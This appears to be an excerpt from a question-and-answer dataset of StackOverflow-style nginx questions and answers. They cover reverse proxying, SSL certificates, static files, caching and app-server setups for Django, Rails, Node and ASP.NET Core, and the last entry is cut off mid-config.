Response
stringlengths 8
2k
| Instruction
stringlengths 18
2k
| Prompt
stringlengths 14
160
|
---|---|---|
Use the "=" modifier to process an exact match on "/":location = / {
proxy_pass http://127.0.0.1:8000;
}
location / {
expires -1;
alias /var/static-site/;
} | I want to have an nginx rule that will proxy requests with empty path/to a back end server, and another rule that match non empty paths, ex.http://mysite/x/y/zThe following two rules do not do this, the second one is catching all:# empty path
location ^/?$ {
proxy_pass http://127.0.0.1:8000;
}
location / {
expires -1;
alias /var/static-site/;
}I have tried/.*/for the second rule, without success... | How to write nginx rules/regexes to match empty non empty path |
I spent a lot of time researching this a while back and the best solution seemed to be using Lua. It's a bit of a pain. I had to compile NGINX with Lua. I usedOpenResty. My use-case required masking sensitive data posted through my NGINX reverse proxy. However its definitely different than yours in that you're using proxy_method to make the additional POST so I'm not 100% it will solve your problem. However, I think it's worth checking out. Here is a small code snippet from my config if it helps. Glad to go into more detail if you need.location /login {
set $request_body_mask "";
# mask client_secret in posts
access_by_lua '
local req = ngx.req.get_body_data()
ngx.var.request_body_mask = ngx.re.gsub(req, "(client_secret=).{8}", "$1********")
';
# mask client_secret in gets
set_by_lua $request_mask '
local req = ngx.var.request_uri
return ngx.re.gsub(req, "(client_secret=).{8}", "$1********")
'; | I'm trying to use NGINX to proxy a request that needs to do a bit of magic in the middle. Essentially I have a client that can only send an unauthenticated GET request, and I need to receive this request, make a POST that will login to a server using static credentials stored in the NGINX config, and replace the response body with an html redirect. This will work for my scenario because the POST response will contain a Set-Cookie header with a session id representing the authenticated session. I know I can useproxy_methodto force NGINX to make the outbound call via POST, and I can usesub_filterto replace the POST response with the html redirect. My question is how can I set a request body that will get sent in the POST request?Any ideas?Ian | Replace request body in NGINX proxy for POST |
As Heroku DevCenter claims,Unicorn workers are vulnerable to slow clients.Each worker is only able to process a single request, andif the client is not ready to accept the entire answer(aka "slow client"),the Unicorn worker is blockedon sending out the responseand cannot handle the next one. Sinceeach Unicorn worker takes up a substantial amount of RAM(again, see Heroku, it claims to handle 2-4 processes at 512 MiB RAM), you cannot rely on number of workers, since it's about the number of clients that canrender your application inoperableby pretending to have slow connections.When behindnginx, Unicorn is able to dump the entire answer into nginx's buffer and switch immediately to handling the next request.That said,nginxwith a single Unicorn worker behind is much more reliable than a bunch of Unicorn workers exposed directly.NB: for the folks using ancient Rubies out there: if you'll be using a set of Unicorn workers, consider migrating to at least Ruby 2.0 to reduce RAM consumption by sharing common data across forked processes (ref). | I read that unicorn is fast to serve static content, slow users, making redirects.Why is better nginx+unicorn vs running unicorn only, and scale the number of unicorn workers when needed?Do you have any numbers showing how much fast is nginx on each of these things(redirecting, proxying, serving static content)? | Is it bad to use unicorn without nginx? why? |
Well ... I found a related questionhere, and I addedproxy_buffering off;to config file and this solve the problem for my case.the file is as follows:server {
listen 80;
server_name myapp.com;
access_log /var/log/nginx/myapp_access.log;
error_log /var/log/nginx/myapp_error.log;
location / {
client_max_body_size 400M;
proxy_read_timeout 120;
proxy_connect_timeout 120;
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Client-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_pass http://127.0.0.1:8888;
proxy_buffering off;
}
} | I request some json data by some url, sometimes it works fine and sometimes doesn't ... I looked another related cuestion here, but it seems to recommend not change content-length by middleware ... my json data incomplete is as image below shows:my app nginx config:server {
listen 80;
server_name myapp.com;
access_log /var/log/nginx/myapp_access.log;
error_log /var/log/nginx/myapp_error.log;
location / {
client_max_body_size 400M;
proxy_read_timeout 120;
proxy_connect_timeout 120;
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Client-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_pass http://127.0.0.1:8888;
}
}gunicorn script:#!/bin/bash
set -e
DJANGODIR=/home/ubuntu/apps/myapp
LOGFILE=/var/log/gunicorn/myapp.log
LOGDIR=$(dirname $LOGFILE)
NUM_WORKERS=3
# user/group to run as
USER=ubuntu
GROUP=ubuntu
cd /home/ubuntu/apps/myapp
source /home/ubuntu/.venv/myapp/bin/activate
export PYTHONPATH=$DJANGODIR:$PYTHONPATH
export NEW_RELIC_CONFIG_FILE=/home/ubuntu/newrelic/newrelic.ini
test -d $LOGDIR || mkdir -p $LOGDIR
exec /usr/local/bin/newrelic-admin run-program /home/ubuntu/.venv/myapp/bin/gunicorn_django -w $NUM_WORKERS \
--user=$USER --group=$GROUP --log-level=debug \
--log-file=$LOGFILE -b 127.0.0.1:8888 2>>$LOGFILE | ngnix + gunicorn throws truncated response body |
Just create a new settings file which includes the original settings and defines a specialROOT_URLCONFsetting. Now you simply need to deploy your app with thatDJANGO_SETTINGS_MODULEon that admin subdomain.e.g.:settings_admin.pyfrom settings import *
ROOT_URLCONF = 'urls_admin'urls_admin.pyfrom django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'', include(admin.site.urls)),
) | I have a project running Django, uWSGI, and Nginx. Currently I use the default Django admin site, served atexample.com/admin. I want to change this so that the admin site is only available atadmin.example.com.What is the best way to do this?I had thought about starting a completely new Django project to be served onadmin.example.combut with the same database settings as the project that runsexample.com, but I'm hoping for something more elegant since this would involve duplicating a lot of the settings and apps between the projects. Basically the only difference between the two would be that one would have the admin site and URL pattern installed and one would not.(My reason for this is eventually wanting to use something likegoogle auth proxyto protect the admin site but have non-admin logins go through the normal authentication backend. It looks like I could do this by specifying that Django use HTTP Basic Auth foradmin.example.com, but stick with the default backend forexample.com.) | Serving Django admin site on subdomain |
As mpcabd mentioned, Stripe webhooks will not follow redirects for security reasons. As he also mentioned, while youcanfilter by IP, it's a never-ending battle (and Stripe has previously stated they do intend to eventually stop publishing an IP list).The even easier and better set-it-and-forget-it solution:In theStripe dashboard, reconfigure your webhooks to use HTTPS.Bam. Done. | I recently modified my nginx server to redirect allwww.mysiterequests tohttps://mysiteThe problem is that when I did that, my stripe webhook I had set up is now failing with a 301 redirect error. How do I alter my nginx server to that only requests coming from my domain are redirected? (or at least I think that's the solution, I'm a front end guy).Here's my server.server {
listen 443;
server_name mysite.com;
root /var/www/mysite.com/app/mysite;
ssl on;
ssl_certificate /etc/nginx/ssl/cert.crt;
ssl_certificate_key /etc/nginx/ssl/mykey.key;
#enables SSLv3/TLSv1, but not SSLv2 which is weak and should no longer be used.
ssl_protocols SSLv3 TLSv1;
#Disables all weak ciphers
ssl_ciphers ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM;
location / {
proxy_pass http://127.0.0.1:3000/;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
server {
listen 80;
server_name www.mysite.com;
return 301 https://mysite.com$request_uri;
} | Redirecting Requests to https breaks Stripe webhook |
Ok, so the error was totally unrelated to nginx. Turns out curl has no engine for running ssl by default on OS X. Therefore, curl never sent any certificate to the server. | I am using nginx for my web server with client certificate authentication. The relevant part of the config is:ssl_certificate /usr/local/etc/nginx/certs/ssl.crt;
ssl_certificate_key /usr/local/etc/nginx/certs/ssl.key;
ssl_client_certificate /usr/local/etc/nginx/certs/server_chain.crt;
ssl_verify_client on;
ssl_verify_depth 2;The client certificates are signed by another server that has a certificate from a root CA. I.e, I want to accept clients that have a certificate chain as follows:CA -> intermediate CA -> clientTherefore the file server_chain.crt is made by:cat intermediate_ca.crt root_ca.crt > server_chain.crtNow, I can sucessfully access the server by issuing the command:openssl s_client -connect localhost:443 -tls1 -cert client.crt \
-key client.key -CApath root_ca.crt -state -debug`and then typingGET /apiBut if I try to reach the same service by using:curl -v -s -k --key client.key --cert client.crt https://localhost/apiI get:
400 No required SSL certificate was sent
400 Bad Request
No required SSL certificate was sent
nginx/1.6.0
I also can not access thelocalhost/apipage from a web browser with a client certificate installed. Something that works if I turn off client verification.Any ideas on what's wrong? | Access server with client certificate using s_client but not curl? |
I found what was the issue.My custom headers wereAPI_USERandAPI_TOKEN.
There is a directive in Nginx that saysto ignore headers with a '_' in the name,more info hereSo I've updated my custom headers tox-api-userandx-api-tokenand now it's working like a charm ! | I'm working with apache on my local instance and nginx on production.I have a javascript application that is setting headers in API calls to authenticate the user. It's working fine on local with my apache server. However for some reason, my custom headers are ignored by Nginx.I tried to add this line in my site configuration:add_header 'Access-Control-Allow-Origin' '*';But it still ignore the headers.
Does anyone know where I should look to bypass this ?Cheers,
Maxime | Nginx is ignoring my headers |
You misunderstand howinternalandX-Accel-Redirectwork.The main idea is that you go to some URL which is proxied to app. Then app decides whether you should get access to file or not. In former case it response withX-Accel-Redirectto protected url (one withinternal).So you should go to some other URL, e.g.http://localhost:4000/get/files/test.jpgand your application could look like this:var http = require('http');
http.createServer(function (req, res) {
if (req.url.indexOf('/get/files/') == 0) {
if (userHasRightToAccess()) {
res.setHeader('X-Accel-Redirect', res.url.slice(4));
res.end('');
} else {
// return some error
}
} else {
console.log(req.url);
res.end('works');
}
}).listen(3000); | I'm trying to set up authorized file access on nginx backed by node.js. For some reason all the examples don't work for me. I'm trying to server files from/data/private/filesMy nginx configuration:...
server {
listen 4000;
server_name localhost;
location / {
proxy_pass http://127.0.0.1:3000/;
}
location /files {
root /data/private;
internal;
}My node server.js:var http = require('http');
http.createServer(function (req, res) {
console.log(req.url);
res.end('works');
}).listen(3000);When I requesthttp://localhost:4000/xyzthen the request is correctly being passed on to node. When I requesthttp://localhost:4000/files/test.jpgI just get a 404 and nothing gets passed to node. What am I doing wrong? When I commend outinternalthen test.jpg gets served correctly by nginx directly, so I assume the paths are correct?I'm pretty sure I had this working at some point before but on a different server somewhere maybe with a different node and nginx version. Tried it with nginx 1.6.0 and 1.2.6, node v0.10.21. I've also added all the proxy_set_header and proxy_pass options that you find in all the examples, nothing works. I'm running this in a Vagrant based Ubuntu VM right now, but doesn't work on Mac either.I know that I have to set the header throughres.setHeader("X-Accel-Redirect", req.url);, but that's not the issue here as I don't even get to that phase where I could set the required header in node. | Nginx X-Accel-Redirect not working with node.js |
Is/var/ngx_pagespeed_cacheyour caching folder? If so, this should work. As Dayo noted, we do not delete the files, just invalidate them.However you can also justrm -rthe caching folder and then reload Nginx (to clear the in-memory cache). If you are using memcached, you'd have to clear that too. | I have google's pagespeed installed with nginx server installed followinghere. I need to flush/delete the previous cached content but could not find a solution. Onpagespeed siteits mentioned to use this command:touch /var/ngx_pagespeed_cache/cache.flushBut I have no success with it. Thanks for any help. | Google PageSpeed not updating cache |
Use the below in yourconfig.ruinsteadrequire "./app"
run Sinatra::ApplicationIt is path issues | Just deployed a ruby app using capistrano. I'm pretty sure I did everything as usual. Passenger though outputs the following:cannot load such file -- app.rb (LoadError)
config.ru:1:in `require'
config.ru:1:in `block in '
/home/deploy/apps/blog/shared/bundle/ruby/2.0.0/gems/rack-1.5.2/lib/rack/builder.rb:55:in `instance_eval'
/home/deploy/apps/blog/shared/bundle/ruby/2.0.0/gems/rack-1.5.2/lib/rack/builder.rb:55:in `initialize'
config.ru:1:in `new'
config.ru:1:in `'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:108:in `eval'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:108:in `preload_app'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:153:in `'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:29:in `'
/home/deploy/.rvm/gems/ruby-2.0.0-p353/gems/passenger-4.0.29/helper-scripts/rack-preloader.rb:28:in `'
**Application root**
/home/deploy/apps/blog/currentThe app.rb actually is in this directory. | cannot load such file -- app.rb (LoadError) |
Assuming no suhosin... Then see:max_input_varsandmax_input_nesting_level.These are newer and often overlooked when people think of POST limits in PHP.But if its truncated like you say then maybe it is just yourpost_max_size.Also, this just has to be a dupe question...PHP max_input_varsIncreasing the maximum post sizeetc.. | The BackgroundI am using CodeIgniter 2.1.4 and PHP 5.3 running on Nginx. I have an HTML form representing what is essentially rows of homogeneous data. Each "row" has severalfields, each with the same name. Here's a simplified example:
So, I've got manyfirstname[]inputs,lastname[]inputs, etc. After submitting the form (the action isPOST), I retrieve the data in a controller method like so (note that I'm using CodeIgniter):$firstnames = $this->input->post('firstnames');
$lastnames = $this->input->post('lastnames');These variables are arrays containing the values from the corresponding rows in the form, and from here I do some processing on this data.The ProblemWhen the number of rows in the form is large (several hundred), the size of the resulting PHP arraysdo not match the number of inputs in the form-- for example, the form might have 200firstnameinputs, but the$firstnamearray only has 167. What's more, the$lastnamevariable has a different size as well -- 166.When the form has a smaller number of elements, everything works fine.My theory is that I am exceeding some sort of maximum size setting or buffer somewhere in the stack, causing the form data to be truncated. Is there a PHP or CodeIgniter or nginx setting for "maximum form size" that I am not aware of?For what it's worth, I have seen the same behavior when using bothapplication/x-www-form-urlencodedormultipart/form-dataas the content type for the form.What am I missing? | Truncated/missing form data when form contains large number of inputs? |
I don't think you can match the args by regex, try this insteadlocation /api/v0/roslyn {
resolver 8.8.8.8;
proxy_pass $scheme://my-windows-box.com/roslyn$is_args$query_string;
} | I'm trying to proxy a certain rest endpoint on my linux api box to my windows box. Here's what I have right now.My linux api box...
location ~ ^/api/v0/roslyn(.*)$ {
resolver 8.8.8.8;
proxy_pass $scheme://my-windows-box.com/roslyn$1;
}For example, I'd like to proxy the following urlhttp://my-linux-box.com/api/v0/roslyn?q=5tohttp://my-windows-box.com/roslyn?q=5However, it seems to be missing the querystring, so the regex is failing? | Nginx proxy_pass having problems with querystring for an API |
you're talking about the optionconnect_timeout?conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='', db='mysql', connect_timeout=20)in DAL terms this option will be something about this (not tested)db = DAL('mysql://username:password@localhost/test', driver_args={connect_timeout=20}) | We have a python application running with uwsgi, nginx.We have a fallback mechanism for DBs. ie., if one server refuses to connect, we connect to the other server. But the issue is that the connection takes more than 60s to timeout.As nginx times out in 60s, it displays the nginx error page. Where can we change the timeout for connecting to mysql servers so that we can make three attempts of connection to mysql in the given 60s nginx timeout period?We use Web2py and default DAL object with pymysql adapter | How to decrease the timeout for my python application connecting to mysql server |
I had the exact same problem.The problem is related to eol (end of lines) handling of certain files with the Perl build used.
You should not use the MSYS Perl build.
Instead you should use ActivePerl or StrawberryPerl, as indicated in theguide.
Be sure though that the PATH points to the appropriate Perl distribution, prior to the MSYS Perl.export PATH=/appropriate/perl/dist:$PATHThisanswerhelped me solve the problem. | I have Windows 7 Pro x86 with Visual Studio 2010 Pro. Also I have MinGW in c:\MinGW.
I want to build nginx under windows using Visual C++. I followthisguide.I run cmd under Administrator, then I call "c:\Program Files\Microsoft Visual Studio 10.0\VC\vcvarsall.bat"In cmd I run C:\MinGW\msys\1.0\msys.batI cd to nginx source direcotry and run configure script, before I downloaded prerequisites.Then I run nmake -f objs/MakefileThe result is the following error:Microsoft (R) Program Maintenance Utility Version 10.00.40219.01
Copyright (C) Microsoft Corporation. All rights reserved.
'install' is up-to-date
cl -O2 -W4 -WX -nologo -MT -Zi -DFD_SETSIZE=1024 -DNO_SYS_TYPES_H
-Ycng x_config.h -Fpobjs/ngx_config.pch -c -I src/core-I src/event
-I src/event/mod ules -I src/os/win32 -I objs/lib/pcre-8.32
-I objs/lib/openssl/openssl/include -I objs/lib/zlib-1.2.7 -I objs
-I src/http -I src/http/modules -I src/mail -Foobjs/ngx_pch.obj
objs/ngx_pch.c ngx_pch.c
cl -c -O2 -W4 -WX -nologo -MT -Zi -DFD_SETSIZE=1024 -DNO_SYS_TYPES_H
-Y ungx_config.h -Fpobjs/ngx_config.pch -I src/core-I src/event
-I src/event/mod ules -I src/os/win32 -I objs/lib/pcre-8.32
-I objs/lib/openssl/openssl/include -I objs/lib/zlib-1.2.7 -I objs
-I src/http -I src/http/modules -I src/mail -Foobjs/src/core/nginx.obj
src/core/nginx.c nginx.c
c:\nginx\source\src\event\ngx_event_openssl.h(15) : fatal error C1083:
Cannot open include file: 'openssl/ssl.h': No such file or directory
NMAKE : fatal error U1077: '"c:\Program Files\Microsoft Visual Studio
10.0\VC\BI N\cl.EXE"' : return code '0x2' Stop.But OpenSSL is located in C:\nginx\source\objs\lib\opensslWhat did I do wrong? | Building nginx in Windows 7 with MSYS |
If you want to indicate that a web browser should download a resource rather than display it, try using theContent-Dispositionheaderas described in RFC 6266. For example, the following response header will tell the browser to download the file:Content-Disposition: attachmentYou can also specify a file name for the downloaded file through this header (if it differs from the last path component in the URL):Content-Disposition: attachment; filename=foo.pdfLooking at theNginx documentation, this response header should work correctly in conjunction with theX-Accel-Redirectfeature you're using. | I want a user to be able to click a link like this:downloadHave a Pyramid 1.2.7 app handle the view like this@view_config(route_name='download')
def download(request):
file_id = request.GET['file']
filename = get_filename(file_id)
headers = request.response.headers
headers['Content-Description'] = 'File Transfer'
headers['Content-Type'] = 'application/force-download'
headers['Accept-Ranges'] = 'bytes'
headers['X-Accel-Redirect'] = ("/path/" + filename + ".pdf")
return request.responseAnd my nginx configuration looks like thislocation /path/ {
internal;
root /opt/tmp;
}This all works but instead of the browser showing a pdf has download, the browser displays a bunch of PDF garbage.How do I setup my Pyramid view to get the browser to do the right thing? | Serve up pdf as a download with Pyramid, ningx, X-Accel-Redirect Header |
you can do it like this:if ($host = albany.mywebsite.com) {
env MAGE_RUN_CODE=w2769;
env $MAGE_RUN_TYPE=website;
}(and so on for the other host values)seehttp://nginx.org/en/docs/ngx_core_module.html#env | I have below .htaccess settings along with my Apache website; now I am moving this in to Nginx. Thus I wonder how can I put below 'SetEnvIf' parmeters in .htaccess file to Nginx configuraiton? I think its by setting up 'fastcgi_param', please help me to do the conversion.SetEnvIf HOST albany\.mywebsite\.com MAGE_RUN_CODE=w2760
SetEnvIf HOST albany\.mywebsite\.com MAGE_RUN_TYPE=website
SetEnvIf HOST alexandria\.mywebsite\.com MAGE_RUN_CODE=w1472
SetEnvIf HOST alexandria\.mywebsite\.com MAGE_RUN_TYPE=website
SetEnvIf HOST annarbor\.mywebsite\.com MAGE_RUN_CODE=w2933
SetEnvIf HOST annarbor\.mywebsite\.com MAGE_RUN_TYPE=websiteThank You. | .htacces-SetEnvIf To NGinx-fastcgi_param Conversion |
It's already about few years when Nginx API changed for this directive, it should be:gzip_disable "msie6";Full stack Nginx+Unicorn optimized configuration can be foundon the gist. | I've inspired my nginx configuration file fromdefunkt's conf file for unicornbut it seems that the linegzip_disable "MSIE [1-6]\.";makes everything crash. I get the error that this site is temporarily unavailable (served fromnginx/html/50x.html). Commenting out the line makes everything work again, fiddling with the regexp doesn't change a thing.I'm running nginx v.1.0.10 and ubuntu 11.10.Any idea? | Why does gzip_disable make nginx crash? |
You have to involve some scripting to make it work. Most what you can get with nginx configuration is customfooter and header.By the way, developerslooks forwardto adding xml index module to nginx. | I want to share folder contents over http. I've installed nginx with autoindex on and configured it to my folder. The problem is it takes me html file with file/folder list, but I want some kind of xml with same information.Is it possible to do it using standard nginx tools, or should I implement some script to solve this problem? | Change nginx autoindex output format |
This is the more logic answer:http://projects.unbit.it/uwsgi/wiki#WherearethebenchmarksThe listen queue size is reported on uWSGI startup logs.But as you have not reported your uWSGI config, it is impossibile to give you the right hint. | httperf ... --rate=20 --send-buffer=4096 --recv-buffer=16384 --num-conns=100 --num-calls=10Gives 1000 requests as expected on nginx.Total: connections 100 requests 1000 replies 1000 test-duration 5.719 s
Connection rate: 17.5 conn/s (57.2 ms/conn, <=24 concurrent connections)
Connection time [ms]: min 699.0 avg 861.3 max 1157.5 median 840.5 stddev 119.5
Connection time [ms]: connect 56.9
Connection length [replies/conn]: 10.000
Request rate: 174.8 req/s (5.7 ms/req)
Request size [B]: 67.0
Reply rate [replies/s]: min 182.0 avg 182.0 max 182.0 stddev 0.0 (1 samples)
Reply time [ms]: response 80.4 transfer 0.0
Reply size [B]: header 284.0 content 177.0 footer 0.0 (total 461.0)
Reply status: 1xx=0 2xx=1000 3xx=0 4xx=0 5xx=0
CPU time [s]: user 1.42 system 4.30 (user 24.9% system 75.1% total 100.0%)
Net I/O: 90.2 KB/s (0.7*10^6 bps)
Errors: total 0 client-timo 0 socket-timo 0 connrefused 0 connreset 0
Errors: fd-unavail 0 addrunavail 0 ftab-full 0 other 0On same hardware querying uWSGI on port 8000 results 200 requests and 100 replies, and 100 reset connections. What's wrong? The server is extremely powerful.Total: connections 100 requests 200 replies 100 test-duration 5.111 s
Connection rate: 19.6 conn/s (51.1 ms/conn, <=5 concurrent connections)
Connection time [ms]: min 69.5 avg 128.4 max 226.8 median 126.5 stddev 27.9
Connection time [ms]: connect 51.4
Connection length [replies/conn]: 1.000
Request rate: 39.1 req/s (25.6 ms/req)
Request size [B]: 67.0
Reply rate [replies/s]: min 19.8 avg 19.8 max 19.8 stddev 0.0 (1 samples)
Reply time [ms]: response 68.8 transfer 8.2
Reply size [B]: header 44.0 content 2053.0 footer 0.0 (total 2097.0)
Reply status: 1xx=0 2xx=100 3xx=0 4xx=0 5xx=0
CPU time [s]: user 1.87 system 3.24 (user 36.6% system 63.4% total 100.0%)
Net I/O: 42.6 KB/s (0.3*10^6 bps)
Errors: total 100 client-timo 0 socket-timo 0 connrefused 0 connreset 100
Errors: fd-unavail 0 addrunavail 0 ftab-full 0 other 0 | Stuck at 100 requests uWSGI |
I created a script to do this two years ago, calledruby-cgi, in response toa similar question. I believe it does exacty what you want. Just set it up the same way you would set up other CGI/FastCGI handlers. | Is there a way to simply send a erb file to a ruby parser get the answer back and send it to client with NGINX? Without all the passenger stuff? It should be easy i guess. I DON'T want to use any rails stuff, don't tell me i should use rails etc. | Is there a simple way to use erb files directly like PHP files with NGINX? |
You can't set cookies via an esi include because esi's are requested by varnish and not by the client.What you can do is include a javascript tag or tracking pixel via ESI and then set your cookies that way. Or you could reverse what you're doing, make your main webserver request set cookies and do your user stuff then include an ESI to get the content which doesn't need cookies. | Im trying to use esi to make a ninja caching on my site.
The idea is, the site is mostly static, I just need to do fancy stuff if the user is logged in or not.
So I was trying to put an on the page A, and set triggers in the application at page B.This way I could cache the page A on varnish, and let the server deal with the small work that is page B.But the cookies I've seted on page B were not forwarded to headers of page A and didn't work =/Is this that Im trying to do possible?I could use ajax, but doing this inside the server, before sending the page to the user seems more correct to me.ps: I can't create an esi tag =/ | Setting Cookies via ESI:include, how? |
That should bealias /var/www/fileUpload/html;otherwise Nginx is looking for the file in/var/www/fileUpload/html/upload/index.html. Seethis documentfor details.For example:location /upload {
alias /var/www/fileUpload/html;
} | I want to call the index.html from the folder /var/www/fileUpload/html. The index.html file exists in that folder.The / router works. the uploadFiles route as well. But when I open the upload route I get a 404 error.server{
listen 80;
server_name xx.xx.xxx.xxx;
location / {
root /var/www/kioskJPE/html;
index index.html;
}
location /upload {
root /var/www/fileUpload/html;
index index.html;
}
location /uploadFiles {
proxy_pass http://localhost:8080;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}Do you have any suggestions?
Thank you! | NGINX 404 not found but file exists |
Your domain registrar has pre-configured an AAAA record for your domain. Remove AAAA record from your DNS-settings. In your case, remove "wwww.mydomain.nl AAAA 2a02:2268:ffff:ffff::4" record. | I have an issue with applying Let's Encrypt SSL certificates to my domains using nginx and certbot. My (Nuxtjs) website is running on a VPS with Ubuntu 18.04. I want to add the certificates to mydomain.nl and staging.mydomain.nl but am unable. I am quite new to this but I did manage to do this before without any problems.If I am correct the certbot tries to places a file to validate the domain when runningsudo certbot --nginx. But then I get the following error:Failed authorization procedure. mydomain.nl (http-01): urn:ietf:params:acme:error:unauthorized :: The client lacks sufficient authorization :: Invalid response from http://mydomain.nl/.well-known/acme-challenge/PBjT0nQy7m5_bE42I1jr5mMaYxLMma4ONP9FAUgCD3c [2a02:2268:ffff:ffff::4]: "\n\n404 Not Found\n\nNot Found\n\n\n404 Not
Found\n\nNot Found\n<p"
To fix these errors, please make sure that your domain name was
entered correctly and the DNS A/AAAA record(s) for that domain
contain(s) the right IP address.I have tried adding this block in the config as wel:location ~ /.well-know/acme-challenge {
allow all;
root /var/www/mydomain.nl/html;
}But no success. I can visit my websites on my domains so the DNS should be correct. | Unable to add Let's encrypt ssl certificate to domains using nginx (certbot) |
I personally had to get header value manually. It was due to the cloud setting. Maybe this will help you.if (Request.Headers.TryGetValue("X-Forwarded-For", out var forwardedIps))
senderIpv4 = forwardedIps.First(); | My environment:
Ubuntu 18.04, Asp.net Core 2.1, NginxI followedthistutorial.
I added this code in Startup.cs:app.UseForwardedHeaders(new ForwardedHeadersOptions
{
ForwardedHeaders = ForwardedHeaders.XForwardedFor | ForwardedHeaders.XForwardedProto
});I configure my Nginx configuration:listen *:443 ssl http2;
location / {
proxy_pass https://localhost:6001;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection keep-alive;
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
proxy_set_header X-Forwarded-Proto-Version $http2;
client_max_body_size 32m;
keepalive_timeout 200;
send_timeout 20;
client_body_timeout 50;
proxy_set_header X-Forwarded-For $remote_addr;
}I get the remote IP by:var ip = HttpContext.Connection.RemoteIpAddress?.ToString();but it always returns 127.0.0.1 from any IP. | Asp.net Core get remote IP of client always returns 127.0.0.1 |
Well. After letting this question be on Stackoverflow for some time I tried to spin up Virtual Machine on my computer. Create a config file with the exact same content. Copy paste from my Windows machine to my linux machine. Uploaded the file to my linux server and it worked.So in short Windows screwed with the content of the file without I was able to see anything. I have uploaded a working version of the file here:https://s3-eu-west-1.amazonaws.com/topswagcode.dev/default | I am trying to setup Nginx to my ASPNET Core WebApi. But I keep running into errors.When I try to check my Config I get:ubuntu@ip-172-26-12-97:~$ sudo nginx -t
nginx: [emerg] unknown directive "server" in /etc/nginx/sites-enabled/default:1
nginx: configuration file /etc/nginx/nginx.conf test failedI have tried to look at the following issues:nginx: [emerg] "http" directive is not allowed here in /etc/nginx/sites-enabled/default:1andnginx: [emerg] unknown directive " " in /etc/nginx/sites-enabled/example.com:3my default config looks like the following:server {
listen 80;
location / {
proxy_pass http://localhost:5000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection keep-alive;
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}Installing Nginx and going to default Nginx server on port 80 works fine. But when I start to upload my own configs and make changes it breaks.Steps:sudo chown ubuntu:ubuntu /etc/nginx/sites-available/defaultso I can use SCP to upload new default sitescp -o StrictHostKeyChecking=no -i {pemFile} -qrp C:/path/. ubuntu@{hostname}:/etc/nginx/sites-available/Bothhttps://garywoodfine.com/deploying-net-core-application-to-aws-lightsail/andhttps://learn.microsoft.com/en-us/aspnet/core/host-and-deploy/linux-nginx?view=aspnetcore-3.0seems pretty similar without any results. | nginx: [emerg] unknown directive "server" in /etc/nginx/sites-enabled/default:1 |
If anyone is interested in the solution I had to explicitly set a location block for the static filesserver {
listen 80;
server_name demo.cerebral.local;
#ssl_certificate /etc/letsencrypt/live/yourdomain.com/fullchain.pem;
#ssl_certificate_key /etc/letsencrypt/live/yourdomain.com/privkey.pem;
#ssl on;
#ssl_session_cache builtin:1000 shared:SSL:10m;
#ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
#ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
#ssl_prefer_server_ciphers on;
gzip on;
gzip_http_version 1.1;
gzip_vary on;
gzip_comp_level 6;
gzip_proxied any;
#gzip_types text/plain text/html text/css application/json application/javascript application/x-javascript text/javascript text/xml application/xml application/rss+xml application/atom+xml application/rdf+xml;
gzip_buffers 16 8k;
gzip_disable “MSIE [1-6].(?!.*SV1)”;
#access_log /var/log/nginx/demo.access.log;
# This location block fixed my issue.
location ~* /(css|js|lib) {
root /var/www/demo/wwwroot;
}
location / {
proxy_pass http://localhost:5000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection keep-alive;
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
} | I have a .net core 3.0 web application that I want to run on a Debian Buster service. I followed the Microsoft instructions foundHere.I was able to get Nginx to serve the pages however none of the styles are showing up.Config fileserver {
listen 80;
server_name yourdomain.com;
return 301 https://$host$request_uri;
}server {
listen 80;
server_name demo.cerebral.local;
#ssl_certificate /etc/letsencrypt/live/yourdomain.com/fullchain.pem;
#ssl_certificate_key /etc/letsencrypt/live/yourdomain.com/privkey.pem;
#ssl on;
#ssl_session_cache builtin:1000 shared:SSL:10m;
#ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
#ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
#ssl_prefer_server_ciphers on;
gzip on;
gzip_http_version 1.1;
gzip_vary on;
gzip_comp_level 6;
gzip_proxied any;
#gzip_types text/plain text/html text/css application/json application/javascript application/x-javascript text/javascript text/xml application/xml application/rss+xml application/atom+xml application/rdf+xml;
gzip_buffers 16 8k;
gzip_disable “MSIE [1-6].(?!.*SV1)”;
#access_log /var/log/nginx/demo.access.log;
location / {
proxy_pass http://localhost:5000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection keep-alive;
